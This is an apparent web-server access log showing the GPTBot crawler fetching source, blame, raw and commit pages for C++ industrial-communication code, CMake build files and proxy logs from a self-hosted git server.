"/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-3_access.log" [Client 74.7.227.38] [Length 47115] [Gzip 12.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs" +[17/Feb/2026:15:44:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-4_access.log" [Client 74.7.227.38] [Length 406929] [Gzip 15.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs" +[17/Feb/2026:15:44:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/docker-compose.yml?display=rendered" [Client 74.7.227.38] [Length 10890] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/docker-compose.yml" +[17/Feb/2026:15:44:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10606] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:15:44:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 13339] [Gzip 4.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:44:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 13339] [Gzip 4.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:44:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 12050] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:44:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 11398] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:44:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10603] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:15:44:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-2_access.log" [Client 74.7.227.38] [Length 38814] [Gzip 17.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-2_access.log" +[17/Feb/2026:15:44:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-1_access.log" [Client 74.7.227.38] [Length 61546] [Gzip 22.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-1_access.log" +[17/Feb/2026:15:44:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-3_access.log" [Client 74.7.227.38] [Length 62144] [Gzip 18.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-3_access.log" +[17/Feb/2026:15:44:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-1_access.log" [Client 74.7.227.38] [Length 10458] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-1_access.log" +[17/Feb/2026:15:44:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-4_access.log" [Client 74.7.227.38] [Length 546191] [Gzip 22.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-4_access.log" +[17/Feb/2026:15:44:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15177] [Gzip 5.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:44:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11604] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:44:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 11049] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:44:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:15:44:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 10237] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" +[17/Feb/2026:15:44:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15178] [Gzip 5.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:44:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11603] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:44:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 11049] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:44:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 10235] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" +[17/Feb/2026:15:44:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 13922] [Gzip 7.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" +[17/Feb/2026:15:44:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 13904] [Gzip 7.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" +[17/Feb/2026:15:44:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 16830] [Gzip 7.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:15:44:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 6268] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:15:44:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 9967] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:15:44:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 10817] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:15:44:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 422] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:15:44:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 16830] [Gzip 7.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:15:44:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 6268] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:15:44:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 9966] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:15:44:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 10817] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:15:44:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 422] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:15:44:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 10238] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:15:44:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 10236] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:15:45:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 12560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:15:45:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 12560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:15:45:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 9983] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:15:45:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 9982] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:15:45:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 21644] [Gzip 28.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:15:45:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 21642] [Gzip 28.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:15:45:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 9986] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/app_init.hpp" +[17/Feb/2026:15:45:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 11294] [Gzip 4.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:15:45:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10220] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:45:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10222] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 